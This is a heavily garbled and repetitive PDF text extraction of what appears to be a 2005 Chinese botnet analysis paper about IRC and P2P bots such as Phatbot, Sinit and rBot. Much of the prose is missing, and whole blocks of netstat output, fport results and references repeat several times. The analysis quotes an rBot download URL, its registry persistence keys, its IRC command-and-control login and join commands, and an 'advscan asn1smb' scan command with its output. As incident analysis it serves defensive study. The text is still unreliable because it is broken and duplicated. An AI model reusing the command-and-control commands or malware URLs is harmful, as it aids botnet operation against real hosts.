[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
()
4 -s silent bot
-gtPRIVMSG rbot password acceptedn
bot
Windows Windows
bot 90
[7]
Windows XP
11
Bot
Symantec 2004 1 6 Bot
2000 30000 [15] MessageLabs 2004
70 [10] CipherTrust 2005 4 5
15 17 20-15
Bot [12]
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
IRC Agobot
PhatBot P2P
IRC P2P
2005 rootkit bot(rBot )
rootkit bot bot
2004
CNCERTCC Bot
IRC
P2P P2P bot
Phatbot[13] sinit[14]
Phatbot Gnutella Guutella cache servers server peer
peer TCP 4387 Gnutella Phatbot
waste waste Phatbot waste
md5
Phatbot
sinit P2P Peer
dll dll sinit
bot
CNCERTCC bot
httpgoa-irccoukwostenrbotexe 2005 7 9 9 rbotexe
IP 10001
sniffer
cmdexe
cgtnetstat anrn
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
TCP 0000135 00000 LISTENING
TCP 0000445 00000 LISTENING
TCP 100011150 203151217856667 ESTABLISHED
TCP 100011616 20210832137445 FIN_WAIT_1
TCP 100011631 20210832147445 FIN_WAIT_1
TCP 100011714 20210832190445 FIN_WAIT_1
TCP 100011727 20210832165445 FIN_WAIT_1
TCP 100012253 20210834211445 TIME_WAIT
TCP 100012904 2021083791445 TIME_WAIT
TCP 100013476 20210839151445 TIME_WAIT
TCP 100013478 20210839153445 TIME_WAIT
TCP 100013480 20210839155445 TIME_WAIT
TCP 100013486 20210839151445 TIME_WAIT
TCP 100013487 20210839153445 TIME_WAIT
TCP 100013488 20210839155445 TIME_WAIT
TCP 100013673 2021084082445 TIME_WAIT
TCP 100013674 2021084082445 TIME_WAIT
TCP 100014953 2021084520445 TIME_WAIT
TCP 100014955 2021084520445 TIME_WAIT
TCP 100014959 2021084523445 TIME_WAIT
TCP 100014961 2021084523445 TIME_WAIT
UDP 000069 UDP 69
UDP 0000445
UDP 10001137
UDP 10001138
fportexe
C gtfport | find 1150 1150 6667
1048 wininit -gt 1150 TCP CWINNTsystem32wininitexe
Cgtfport | find 69
1048 wininit -gt 69 UDP CWINNTsystem32wininitexe
6667 69 wininitexe rBot
wininitexe sysinternals FileMon
bot sysinternals autoruns
rBot
HKLMSoftwareMicrosoftWindowsCurrentVersionRunMicrosoft Update 32 wininitexe
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesMicrosoft Update 32 wininitexe
Wininit 445 6667
IP
20315121785 6667
TCP
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Wininit IRC
-gtNICK CHN|9148119rnUSER autdeoxsnv 0 0 CHN|9148119rn ( )
-gtJOIN xdcc dropitrn ( xdcc dropit)
lt- CHN|9148119 autdeoxsnv 10001 332 CHN|9148119 xdcc advscan asn1smb 100 5 0 b (
advscan asn1smb )
-gtPRIVMSG xdcc [SCAN] Sequential Port Scan Started On 10000445 within a delay of 5 seconds for 0
min using 100 threadsrn( )
CNCERTCC 2005
[1]
20054
[2] Malicious Bots Hide Using Rootkit Code By Paul F Roberts May 17 2005
httpwwweweekcomarticle201759181697200asp
[3] honeynet project plusmn Kno w your ene my
Tracking Botnet
[4] Botnet Tracking Exploring a Root-Cause Methodology to Prevent Distributed Denial-of-Service Attacks
Felix C Freiling and Thorsten Holz and Georg Wicherski httpwwwhoneynetorgpapersindividual
[5] Detecting Bots in Internet Relay Chat Systems Jonas Bolliger Thomas Kaufmann
wwwtikeeethzch~ddosvaxsadasa-2004-29taskpdf
[6] Know your EnemyPhishing httpwwwhoneynetorg 16th May 2005
[7] Shield First-Line Worm Defense Helen J Wang Chuanxiong Daniel R Simon and Alf Zugenmaier
Microsoft Research ACM SIGCOMM 2004
[8] httpwwwmwcollectorg
[9] httpwwwcertorg
[10] httpwwwmessagelabcouk
[11] Joe Stewart deg E mer gi ng Threats Fr o m Discover y t o Pr ot ecti o
wwwsdissaorgdownloadsemergingthreats-publicpdf
[12] httpwwwciphertrustcomresourcesstatisticszombiephp
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
[13] Lurhq Threat Intelligence Group Phatbot Trojan Analysis httpwwwlurhqcomphatbothtml
[14] Lurhq Threat Intelligence Group
Sinit P2P Trojan Analysis httpwwwlurhqcomsinithtml
[15] httpwwwsymanteccompressindex_2004html
[16] Tom Vogt Simulating and optimising worm propagation algorithms
wwwsecurityfocuscomguest24046 20039
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
This document was created with Win2PDF available at httpwwwdaneprairiecomThe unregistered version of Win2PDF is for evaluation or non-commercial use only
Recommended